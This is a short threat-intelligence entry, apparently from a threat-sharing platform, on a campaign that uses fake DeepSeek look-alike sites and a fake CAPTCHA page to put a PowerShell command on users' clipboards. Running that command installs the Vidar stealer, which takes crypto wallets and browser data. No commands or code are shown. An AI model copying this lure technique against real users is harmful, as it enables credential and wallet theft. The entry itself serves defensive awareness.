DeepSeek Lure Used To Spread Malware
Essential information
- Published
- 25/02/2025 19:40
- Modified
- 26/02/2025 08:53
- Tags
- 2025-02-25 brand impersonation captcha clipboard injection cryptocurrency deepseek vidar
- Related entities
- 40 observables, 12 techniques (mitre), 1 malware
Description
Cybercriminals are exploiting DeepSeek's popularity by creating fake look-alike domains to deliver the Vidar information stealer. The attack chain involves a deceptive website that prompts users to complete a fake partner registration, leading to a malicious CAPTCHA page. This page injects a PowerShell command into the user's clipboard, which when executed, downloads and launches the Vidar malware. Vidar targets cryptocurrency wallets, browser data, and sensitive files, using Telegram and Steam for C2 communication. The campaign highlights the rapid exploitation of AI technologies by threat actors and emphasizes the need for enhanced security measures and user education.